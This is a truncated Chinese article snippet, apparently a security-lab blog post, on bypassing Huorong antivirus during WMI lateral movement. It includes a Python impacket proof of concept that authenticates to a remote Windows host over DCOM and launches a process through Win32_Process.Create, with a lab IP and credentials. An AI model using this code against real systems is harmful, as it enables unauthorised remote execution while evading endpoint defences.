今天看啥  ›  专栏  ›  黑白天实验室

绕过杀软进行横向移动

黑白天实验室  · 公众号  ·  · 2023-08-15 16:48
查看拦截日志wmi是基于135端口进行的横向。依赖445只是因为,需要使用445取回命令执行结果。sharpwmi进行横向的时候火绒日志有一个特别有趣的地方:这个是winmgmt的CLSID,假设sharpwmi调用这个dcom对象导致的被拦截?于是我马上自己用python写了一个wmiexec进行验证。调用calc验证我的想法,使用Process Hacker进行监控进程。编写poc绕过from impacket.dcerpc.v5.dcomrt import DCOMConnection, COMVERSIONfrom impacket.dcerpc.v5.dcom import wmifrom impacket.dcerpc.v5.dtypes import NULLdcom = DCOMConnection("192.168.111.180", "administrator", "123456")iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)iWbemLevel1Login.RemRelease()win32Process, _ = iWbemServices.GetObject('Win32_Process')win32Process.Create("c:\\windows\\system32\\ca ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照